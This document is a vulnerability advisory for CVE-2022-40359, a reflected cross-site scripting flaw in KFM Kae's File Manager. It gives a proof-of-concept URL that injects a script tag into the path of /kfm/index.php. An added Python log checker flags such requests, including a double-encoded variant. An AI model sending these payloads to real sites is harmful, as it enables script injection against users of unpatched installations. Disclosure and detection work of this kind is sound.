| CVE | Category | Price | Severity |
|---|---|---|---|
| CVE-2022-40359 | CWE-79 | N/A | High |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| kfm-kae-039 | High | Remote | 2022-09-22 |
```
# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage: https://code.google.com/archive/p/kfm/downloads
# Software Link: https://code.google.com/archive/p/kfm/downloads
# Version: ALL
# Tested on: Linux, Windows
# CVE : CVE-2022-40359

Cross-site scripting (XSS) vulnerability in kfm through 1.4.7 via a crafted GET request to /kfm/index.php.

Visit the PoC URL in a browser:

https://{URL}/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E
```
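A log check for the request shape described above, as an added example that is not part of the original advisory: it flags requests to `/kfm/index.php` whose trailing path info carries markup characters once percent-decoding is undone. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Entry point named in the advisory; matched case-insensitively.
ENTRY_RE = re.compile(re.escape("/kfm/index.php"), re.IGNORECASE)
# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Markup metacharacters that path info after index.php should never carry.
MARKUP_RE = re.compile(r"[<>\"']")

# Constructed sample log lines (documentation IP ranges); line 2 is the advisory's PoC request.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Sep/2022:10:01:02 +0000] "GET /kfm/index.php HTTP/1.1" 200 5120
203.0.113.7 - - [22/Sep/2022:10:01:09 +0000] "GET /kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E HTTP/1.1" 200 5177
198.51.100.4 - - [22/Sep/2022:10:02:30 +0000] "GET /kfm/index.php/%2527%253Cscript%253E HTTP/1.1" 200 5150
198.51.100.9 - - [22/Sep/2022:10:03:11 +0000] "GET /kfm/index.php/ HTTP/1.1" 200 5120
""".splitlines()


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_path_info(log_line):
    """Return the decoded path info if it follows index.php and contains markup, else None."""
    request = REQUEST_RE.search(log_line)
    if not request:
        return None
    # Only the path is inspected here; the query string is dropped before decoding.
    path = decode_fully(request.group("target").split("?", 1)[0])
    entry = ENTRY_RE.search(path)
    if not entry:
        return None
    path_info = path[entry.end():]
    if path_info.startswith("/") and MARKUP_RE.search(path_info):
        return path_info
    return None


def flag_lines(lines):
    """Return (line_number, decoded_path_info) for every suspicious entry."""
    hits = ((n, suspicious_path_info(line)) for n, line in enumerate(lines, 1))
    return [(n, info) for n, info in hits if info is not None]
```

Calling `flag_lines(SAMPLE_LOG)` reports lines 2 and 3 of the constructed sample; the plain and trailing-slash requests pass.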